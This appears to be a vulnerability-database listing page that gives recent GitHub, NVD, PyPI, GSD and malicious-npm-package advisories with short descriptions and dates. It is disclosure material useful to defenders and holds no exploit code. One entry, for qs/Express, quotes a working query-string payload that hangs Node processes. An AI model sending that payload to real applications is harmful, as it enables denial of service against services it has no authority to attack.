Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ghsa-wfm2-rq5g-f8v5 (github) @account-kit/smart-contracts Allowlist Module Bypass Vulnerability 2025-04-29T15:11:41Z 2025-04-29T15:11:41Z
ghsa-jmjf-mfhm-j3gf (github) AWorld OS Command Injection vulnerability 2025-04-28T21:30:43Z 2025-04-29T15:08:09Z
ghsa-ff77-26x5-69cr (github) Apache Tomcat Rewrite rule bypass 2025-04-28T21:30:43Z 2025-04-29T15:03:25Z
ghsa-3p2h-wqq4-wf4h (github) Apache Tomcat Denial of Service via invalid HTTP priority header 2025-04-28T21:30:43Z 2025-04-29T14:59:22Z
ghsa-hj4w-hm2g-p6w5 (github) vLLM Vulnerable to Remote Code Execution via Mooncake Integration 2025-04-29T14:52:29Z 2025-04-29T14:52:29Z
ghsa-9f8f-2vmf-885j (github) Data exposure via ZeroMQ on multi-node vLLM deployment 2025-04-29T14:50:59Z 2025-04-29T14:50:59Z
ghsa-59x8-cvxh-3mm4 (github) YesWiki Stored XSS Vulnerability in Comments 2025-04-29T14:49:12Z 2025-04-29T14:49:12Z
ghsa-88xg-v53p-fpvf (github) YesWiki Remote Code Execution via Arbitrary PHP File Write and Execution 2025-04-29T14:45:42Z 2025-04-29T14:45:42Z
ghsa-wc9g-6j9w-hr95 (github) YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download 2025-04-29T14:41:31Z 2025-04-29T14:41:31Z
ghsa-2f8p-qqx2-gwr2 (github) YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting 2025-04-29T14:38:12Z 2025-04-29T14:38:12Z
ghsa-cg4f-cq8h-3ch8 (github) Yeswiki Vulnerable to Authenticated Reflected Cross-site Scripting 2025-04-29T14:37:04Z 2025-04-29T14:37:04Z
ghsa-ggqx-43h2-55jp (github) Yeswiki Vulnerable to Unauthenticated Reflected Cross-site Scripting 2025-04-29T14:36:10Z 2025-04-29T14:36:10Z
ghsa-r9gv-qffm-xw6f (github) Yeswiki Vulnerable to Unauthenticated Reflected Cross-site Scripting 2025-04-29T14:35:20Z 2025-04-29T14:35:20Z
ghsa-75v8-2h7p-7m2m (github) Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content 2025-04-26T21:31:26Z 2025-04-29T14:07:17Z
ghsa-mvgm-3rw2-7j4r (github) org.xwiki.platform:xwiki-platform-security-requiredrights-default required rights analysis doesn't consider TextAreas with default content type 2025-04-29T14:05:54Z 2025-04-29T14:05:54Z
ghsa-rp38-24m3-rx87 (github) The lesscss script service allows cache clearing without programming right 2025-04-29T14:01:47Z 2025-04-29T14:03:33Z
ghsa-x7wv-5qg4-vmr6 (github) org.xwiki.platform:xwiki-platform-component-wiki provides no warning when granting XWiki.ComponentClass programming right 2025-04-29T14:03:13Z 2025-04-29T14:03:13Z
ghsa-987p-r3jc-8c8v (github) Solr script service doesn't take dropped programming right into account 2025-04-29T13:59:45Z 2025-04-29T13:59:45Z
ghsa-pjhg-9wr9-rj96 (github) org.xwiki.platform:xwiki-platform-wysiwyg-api Open Redirect vulnerability 2025-04-29T13:57:23Z 2025-04-29T13:57:23Z
ghsa-c8hm-hr8h-5xjw (github) n8n Vulnerable to Stored XSS through Attachments View Endpoint 2025-04-28T21:02:23Z 2025-04-29T13:15:15Z
ghsa-hff2-x2j9-gxgv (github) Keylime: unhandled exceptions could lead to invalid attestation states 2022-10-28T19:19:42Z 2025-04-29T13:15:08Z
ghsa-9cx2-hj6m-fv58 (github) Silverstripe XSS in shortcodes 2022-11-21T23:58:20Z 2025-04-29T13:14:57Z
ghsa-vvxf-r4vm-2vm6 (github) Reflected XSS in querystring parameters 2022-11-21T23:59:56Z 2025-04-29T13:14:39Z
ghsa-m2xp-jxfg-qq6g (github) CKAN contains Improper Authentication leading to account takeover 2022-11-22T03:30:56Z 2025-04-29T13:14:27Z
ghsa-wmjq-jrm2-9wfr (github) NodeJS Driver for Snowflake has race condition when checking access to Easy Logging configuration file 2025-04-28T20:31:03Z 2025-04-29T13:10:46Z
ghsa-6jgm-j7h2-2fqg (github) Go Snowflake Driver has race condition when checking access to Easy Logging configuration file 2025-04-28T20:27:29Z 2025-04-29T13:10:41Z
ghsa-c82r-c9f7-f5mj (github) Snowflake Connector for .NET has race condition when checking access to Easy Logging configuration file 2025-04-28T20:25:51Z 2025-04-29T13:10:37Z
ghsa-v96g-5j57-774c (github) A flaw was found in the mod_auth_openidc module for Apache httpd. This flaw allows a remote, unau... 2025-04-29T12:30:21Z 2025-04-29T12:30:21Z
ghsa-jgvv-fw39-8435 (github) An XSS issue was discovered in MDaemon Email Server version 25.0.1 and below. An attacker can sen... 2025-04-29T12:30:21Z 2025-04-29T12:30:21Z
ghsa-fpwr-67px-3qhx (github) A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the huggingface/tr... 2025-04-29T12:30:21Z 2025-04-29T12:30:21Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2022-45152 (NVD) N/A A blind Server-Side Request Forgery (SSRF) vulnerability was found in Moodle. This flaw exists due to insufficient validation of user-supplied input in LTI provider library. The library does not utilise Moodle's inbuilt cURL helper, which resulted in a blind SSRF risk. An attacker can send a specially crafted HTTP request and trick the application to initiate requests to arbitrary systems. This vulnerability allows a remote attacker to perform SSRF attacks. n/a
 Moodle
 2022-11-25T00:00:00.000Z 2025-04-29T14:22:36.364Z
cve-2025-2817 (NVD) N/A Mozilla Firefox's update mechanism allowed a medium-integrity user process to interfere with the SYSTEM-level updater by manipulating the file-locking behavior. By injecting code into the user-privileged process, an attacker could bypass intended access controls, allowing SYSTEM-level file operations on paths controlled by a non-privileged user and enabling privilege escalation. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Firefox ESR < 115.23, Thunderbird < 138, and Thunderbird ESR < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Firefox ESR
Thunderbird
Thunderbird ESR
 2025-04-29T13:13:33.783Z 2025-04-29T14:22:00.891Z
cve-2022-45205 (NVD) N/A Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:20:47.951Z
cve-2022-45206 (NVD) N/A Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/duplicate/check. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:18:23.009Z
cve-2022-45207 (NVD) N/A Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component updateNullByEmptyString. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:16:39.890Z
cve-2022-43707 (NVD) N/A MyBB 1.8.31 has a Cross-site scripting (XSS) vulnerability in the visual MyCode editor (SCEditor) allows remote attackers to inject HTML via user input or stored data n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:16:33.815Z
cve-2022-43708 (NVD) N/A MyBB 1.8.31 has a (issue 2 of 2) cross-site scripting (XSS) vulnerabilities in the post Attachments interface allow attackers to inject HTML by persuading the user to upload a file with specially crafted name n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:15:07.099Z
cve-2022-45208 (NVD) N/A Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/user/putRecycleBin. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:14:49.142Z
cve-2025-4064 (NVD) ScriptAndTools Online-Travling-System viewenquiry.php access control ScriptAndTools
 Online-Travling-System
 2025-04-29T14:00:07.570Z 2025-04-29T14:14:14.470Z
cve-2022-45210 (NVD) N/A Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/user/deleteRecycleBin. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:13:58.518Z
cve-2022-43709 (NVD) N/A MyBB 1.8.31 has a SQL injection vulnerability in the Admin CP's Users module allows remote authenticated users to modify the query string via direct user input or stored search filter settings. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:12:48.349Z
cve-2022-3980 (NVD) An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. Sophos
 Sophos Mobile managed on-premises
 2022-11-16T00:00:00.000Z 2025-04-29T14:12:08.837Z
cve-2022-44174 (NVD) N/A Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:11:13.420Z
cve-2022-45225 (NVD) N/A Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/book. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the book_title parameter. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:10:18.572Z
cve-2022-44175 (NVD) N/A Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:10:00.474Z
cve-2022-44176 (NVD) N/A Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function fromSetRouteStatic. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:08:41.945Z
cve-2022-45475 (NVD) N/A Tiny File Manager version 2.4.8 allows an unauthenticated remote attacker to access the application's internal files. This is possible because the application is vulnerable to broken access control. n/a
 Tiny File Manager
 2022-11-25T00:00:00.000Z 2025-04-29T14:07:53.180Z
cve-2022-44177 (NVD) N/A Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:06:36.725Z
cve-2022-44178 (NVD) N/A Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:05:37.591Z
cve-2022-45476 (NVD) N/A Tiny File Manager version 2.4.8 executes the code of files uploaded by users of the application, instead of just returning them for download. This is possible because the application is vulnerable to insecure file upload. n/a
 Tiny File Manager
 2022-11-25T00:00:00.000Z 2025-04-29T14:05:00.400Z
cve-2022-44180 (NVD) N/A Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:04:30.861Z
cve-2022-44183 (NVD) N/A Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:02:16.399Z
cve-2025-3301 (NVD) CVSS-v4.0: 1 DPA Countermeasures Unavailable for Certain Cryptographic Operations on Series 2 Devices silabs.com
 Series 2 SoCs and associated modules
 2025-04-29T13:47:42.717Z 2025-04-29T14:02:03.494Z
cve-2022-45885 (NVD) N/A An issue was discovered in the Linux kernel through 6.0.9. drivers/media/dvb-core/dvb_frontend.c has a race condition that can cause a use-after-free when a device is disconnected. n/a
 n/a
 2022-11-25T00:00:00.000Z 2025-04-29T14:01:12.549Z
cve-2022-45016 (NVD) N/A A cross-site scripting (XSS) vulnerability in the Search Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Footer field. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T14:00:48.432Z
cve-2022-45017 (NVD) N/A A cross-site scripting (XSS) vulnerability in the Overview Page settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Loop field. n/a
 n/a
 2022-11-21T00:00:00.000Z 2025-04-29T13:59:07.792Z
cve-2022-24999 (NVD) N/A qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable). n/a
 n/a
 2022-11-26T00:00:00.000Z 2025-04-29T13:56:42.673Z
cve-2022-45470 (NVD) N/A Apache Hama allows XSS and information disclosure Apache Software Foundation
 Apache Hama
 2022-11-21T00:00:00.000Z 2025-04-29T13:56:28.845Z
cve-2022-45914 (NVD) N/A The ESL (Electronic Shelf Label) protocol, as implemented by (for example) the OV80e934802 RF transceiver on the ETAG-2130-V4.3 20190629 board, does not use authentication, which allows attackers to change label values via 433 MHz RF signals, as demonstrated by disrupting the organization of a hospital storage unit, or changing retail pricing. n/a
 n/a
 2022-11-27T00:00:00.000Z 2025-04-29T13:55:26.106Z
cve-2022-45930 (NVD) N/A A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/DomainStore.java deleteDomain function is affected for the /auth/v1/domains/ API interface. n/a
 n/a
 2022-11-27T00:00:00.000Z 2025-04-29T13:54:22.132Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2025-25774 (NVD) N/A An issue was discovered in Open5GS v2.7.2. When a UE switches between two gNBs and sends a handover request at a specific time, it may cause an exception in the AMF's internal state machine, leading to an AMF crash and resulting in a Denial of Service (DoS). n/a
 n/a
 2025-03-12T00:00:00.000Z 2025-03-12T19:20:50.881Z
cve-2008-0888 (NVD) N/A The NEEDBITS macro in the inflate_dynamic function in inflate.c for unzip can be invoked using invalid buffers, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors that trigger a free of uninitialized or previously-freed data. info-zip
 unzip
 2008-03-17T21:00:00 2025-04-02T13:36:47.269Z
cve-2024-13884 (NVD) N/A Limit Bio <= 1.0 - Reflected XSS Unknown
 Limit Bio
 2025-03-13T06:00:03.037Z 2025-03-14T16:29:53.044Z
cve-2024-13885 (NVD) N/A WP E Customers <= 0.0.1 - Reflected XSS Unknown
 WP e-Customers Beta
 2025-03-13T06:00:04.928Z 2025-03-14T16:23:53.184Z
cve-2025-38152 (NVD) N/A remoteproc: core: Clear table_sz when rproc_shutdown Linux
Linux
 Linux
Linux
 2025-04-18T07:01:31.714Z 2025-04-18T07:01:31.714Z
cve-2024-13891 (NVD) N/A Schedule <= 1.0.0 - Reflected XSS Unknown
 Schedule
 2025-03-13T06:00:05.847Z 2025-03-14T16:12:55.517Z
cve-2025-38049 (NVD) N/A x86/resctrl: Fix allocation of cleanest CLOSID on platforms with no monitors Linux
Linux
 Linux
Linux
 2025-04-18T07:01:30.421Z 2025-04-18T07:01:30.421Z
cve-2025-1401 (NVD) N/A WP Click Info <= 2.7.4 - Reflected XSS Unknown
 WP Click Info
 2025-03-13T06:00:06.682Z 2025-03-14T16:09:48.349Z
cve-2025-1436 (NVD) N/A Limit Bio <= 1.0 - Stored XSS via CSRF Unknown
 Limit Bio
 2025-03-13T06:00:07.220Z 2025-03-14T16:05:53.487Z
cve-2025-29208 (NVD) N/A CodeZips Gym Management System v1.0 is vulnerable to SQL injection in the name parameter within /dashboard/admin/deleteroutine.php. n/a
 n/a
 2025-04-01T00:00:00.000Z 2025-04-14T17:29:40.090Z
cve-2025-30356 (NVD) Heap Buffer Overflow via Incomplete Length Check in `Crypto_TC_ApplySecurity` nasa
 CryptoLib
 2025-04-01T22:06:22.576Z 2025-04-02T13:46:42.702Z
cve-2025-39728 (NVD) N/A clk: samsung: Fix UBSAN panic in samsung_clk_init() Linux
Linux
 Linux
Linux
 2025-04-18T07:01:35.818Z 2025-04-18T07:01:35.818Z
cve-2025-4093 (NVD) N/A Memory safety bug present in Firefox ESR 128.9, and Thunderbird 128.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 128.10 and Thunderbird ESR < 128.10. Mozilla
Mozilla
 Firefox ESR
Thunderbird ESR
 2025-04-29T13:13:50.917Z 2025-04-29T13:13:50.917Z
cve-2025-4092 (NVD) N/A Memory safety bugs present in Firefox 137 and Thunderbird 137. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:49.479Z 2025-04-29T13:13:49.479Z
cve-2025-4091 (NVD) N/A Memory safety bugs present in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Thunderbird < 138, and Thunderbird ESR < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Thunderbird
Thunderbird ESR
 2025-04-29T13:13:48.089Z 2025-04-29T13:13:48.089Z
cve-2025-4090 (NVD) N/A A vulnerability existed in Firefox for Android where potentially sensitive library locations were logged via Logcat. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:46.677Z 2025-04-29T13:13:46.677Z
cve-2025-4089 (NVD) N/A Due to insufficient escaping of special characters in the "copy as cURL" feature, an attacker could trick a user into using this command, potentially leading to local code execution on the user's system. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:45.152Z 2025-04-29T13:13:45.152Z
cve-2025-4088 (NVD) N/A A security vulnerability in Firefox allowed malicious sites to use redirects to send credentialed requests to arbitrary endpoints on any site that had invoked the Storage Access API. This enabled potential Cross-Site Request Forgery attacks across origins. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:43.684Z 2025-04-29T13:13:43.684Z
cve-2025-4087 (NVD) N/A A vulnerability was identified in Firefox where XPath parsing could trigger undefined behavior due to missing null checks during attribute access. This could lead to out-of-bounds read access and potentially, memory corruption. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Thunderbird < 138, and Thunderbird ESR < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Thunderbird
Thunderbird ESR
 2025-04-29T13:13:42.302Z 2025-04-29T13:13:42.302Z
cve-2025-4086 (NVD) N/A A specially crafted filename containing a large number of encoded newline characters could obscure the file's extension when displayed in the download dialog. *This bug only affects Firefox for Android. Other versions of Firefox are unaffected.* This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:40.899Z 2025-04-29T13:13:40.899Z
cve-2025-4085 (NVD) N/A An attacker with control over a content process could potentially leverage the privileged UITour actor to leak sensitive information or escalate privileges. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:39.469Z 2025-04-29T13:13:39.469Z
cve-2025-4084 (NVD) N/A Due to insufficient escaping of the special characters in the "copy as cURL" feature, an attacker could trick a user into using this command, potentially leading to local code execution on the user's system. *This bug only affects Firefox for Windows. Other versions of Firefox are unaffected.* This vulnerability affects Firefox ESR < 128.10, Firefox ESR < 115.23, and Thunderbird ESR < 128.10. Mozilla
Mozilla
Mozilla
 Firefox ESR
Firefox ESR
Thunderbird ESR
 2025-04-29T13:13:38.073Z 2025-04-29T13:13:38.073Z
cve-2025-4083 (NVD) N/A A process isolation vulnerability in Firefox stemmed from improper handling of javascript: URIs, which could allow content to execute in the top-level document's process instead of the intended frame, potentially enabling a sandbox escape. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Firefox ESR < 115.23, Thunderbird < 138, and Thunderbird ESR < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Firefox ESR
Thunderbird
Thunderbird ESR
 2025-04-29T13:13:36.578Z 2025-04-29T13:13:36.578Z
cve-2025-4082 (NVD) N/A Modification of specific WebGL shader attributes could trigger an out-of-bounds read, which, when chained with other vulnerabilities, could be used to escalate privileges. *This bug only affects Firefox for macOS. Other versions of Firefox are unaffected.* This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Firefox ESR < 115.23, Thunderbird < 138, and Thunderbird ESR < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Firefox ESR
Thunderbird
Thunderbird ESR
 2025-04-29T13:13:35.242Z 2025-04-29T13:13:35.242Z
cve-2025-4064 (NVD) ScriptAndTools Online-Travling-System viewenquiry.php access control ScriptAndTools
 Online-Travling-System
 2025-04-29T14:00:07.570Z 2025-04-29T14:14:14.470Z
cve-2025-4063 (NVD) code-projects Student Information Management System cancel stack-based overflow code-projects
 Student Information Management System
 2025-04-29T13:31:05.581Z 2025-04-29T13:31:05.581Z
cve-2025-4062 (NVD) code-projects Theater Seat Booking System cancel stack-based overflow code-projects
 Theater Seat Booking System
 2025-04-29T13:31:03.930Z 2025-04-29T13:31:03.930Z
cve-2025-4061 (NVD) code-projects Clothing Store Management System add_item stack-based overflow code-projects
 Clothing Store Management System
 2025-04-29T13:00:06.354Z 2025-04-29T13:17:37.126Z
cve-2025-45953 (NVD) N/A A vulnerability was found in PHPGurukul Hostel Management System 2.1 in the /hostel/change-password.php file of the user panel - Change Password component. Improper handling of session data allows a Session Hijacking attack, exploitable remotely n/a
 n/a
 2025-04-28T00:00:00.000Z 2025-04-29T13:45:31.706Z
cve-2025-45949 (NVD) N/A A critical vulnerability was found in PHPGurukul User Registration & Login and User Management System V3.3 in the /loginsystem/change-password.php file of the user panel - Change Password component. Improper handling of session data allows a Session Hijacking attack, exploitable remotely and leading to account takeover. n/a
 n/a
 2025-04-28T00:00:00.000Z 2025-04-29T13:47:06.220Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platfo... 2024-09-12T13:15:00Z 2025-04-29T12:06:53.856952Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platfo... 2024-09-12T13:15:00Z 2025-04-29T12:06:53.795628Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platfo... 2024-09-12T13:15:00Z 2025-04-29T12:06:53.733239Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platfor... 2024-09-12T13:15:00Z 2025-04-29T12:06:53.668489Z
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 co... 2023-12-11T21:15:00Z 2025-04-29T12:06:53.587793Z
pysec-2025-34 The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_c... 2025-04-24T01:15:49+00:00 2025-04-24T03:08:15.436691+00:00
pysec-2025-33 Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the precomp... 2025-01-14T18:16:05+00:00 2025-04-23T21:23:01.322686+00:00
pysec-2025-32 BentoML is a Python library for building online serving systems optimized for AI apps and model i... 2025-04-09T16:15:25+00:00 2025-04-22T19:21:34.073355+00:00
pysec-2024-111 A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs ver... 2024-10-29T13:15:00Z 2025-04-22T15:35:43.008056Z
pysec-2025-31 vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statements by fi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.116292+00:00
pysec-2025-30 vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single expressi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.064106+00:00
pysec-2025-29 vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the babyloni... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.005382+00:00
pysec-2025-28 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.772920+00:00
pysec-2025-27 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.711157+00:00
pysec-2025-26 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.645758+00:00
pysec-2021-891 CWE - CWE-287: Improper Authentication vulnerability in SUSE Linux Enterprise Server 15 SP 3; ope... 2021-03-03T10:15:13+00:00 2025-04-09T17:27:27.582884+00:00
pysec-2025-25 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the CORS middleware is ... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.532849+00:00
pysec-2025-24 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the /api/remove endpoin... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.486485+00:00
pysec-2025-23 Versions of the package ray before 2.43.0 are vulnerable to Insertion of Sensitive Information in... 2025-03-06T05:15:16+00:00 2025-04-09T17:27:27.434099+00:00
pysec-2022-43179 Poetry is a dependency manager for Python. To handle dependencies that come from a Git repository... 2022-09-07T19:15:08+00:00 2025-04-09T17:27:27.255151+00:00
pysec-2025-22 A vulnerability, that could result in Remote Code Execution (RCE), has been found in PlotAI. Lack... 2025-03-10T14:15:24+00:00 2025-04-09T17:27:27.203714+00:00
pysec-2023-311 plone.namedfile allows users to handle `File` and `Image` fields targeting, but not depending on,... 2023-09-21T15:15:10+00:00 2025-04-09T17:27:27.153848+00:00
pysec-2025-21 picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives whe... 2025-03-10T12:15:12+00:00 2025-04-09T17:27:27.016747+00:00
pysec-2025-20 picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to cra... 2025-03-10T12:15:10+00:00 2025-04-09T17:27:26.966215+00:00
pysec-2025-19 picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vuln... 2025-03-03T19:15:34+00:00 2025-04-09T17:27:26.916350+00:00
pysec-2025-18 picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a mali... 2025-02-26T15:15:24+00:00 2025-04-09T17:27:26.867210+00:00
pysec-2023-310 Mobile Security Framework (MobSF) <=v3.7.8 Beta is vulnerable to Insecure Permissions. NOTE: the ... 2023-09-21T22:15:11+00:00 2025-04-09T17:27:26.663665+00:00
pysec-2025-17 In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a pa... 2025-03-20T10:15:54+00:00 2025-04-09T17:27:26.322333+00:00
pysec-2023-309 Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-13T00:15:07+00:00 2025-04-09T17:27:26.271200+00:00
pysec-2023-308 Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. 2023-07-19T01:15:10+00:00 2025-04-09T17:27:26.223213+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
mal-2024-8895 Malicious code in bamoe-standalone-dmn-editor (npm) 2024-09-18T04:58:36Z 2024-09-20T00:30:53Z
mal-2024-8887 Malicious code in ui-extensions-test-utils (npm) 2024-09-17T11:46:00Z 2024-09-20T00:30:53Z
mal-2024-8875 Malicious code in rust-functions (npm) 2024-09-16T08:19:53Z 2024-09-20T00:30:53Z
mal-2024-8874 Malicious code in events_pkg (npm) 2024-09-16T05:30:36Z 2024-09-20T00:30:53Z
mal-2024-3074 Malicious code in symphony-lib (npm) 2024-06-25T13:02:39Z 2024-09-20T00:30:53Z
mal-2024-3035 Malicious code in source-registry-storage-adapter (npm) 2024-06-25T13:01:35Z 2024-09-20T00:30:53Z
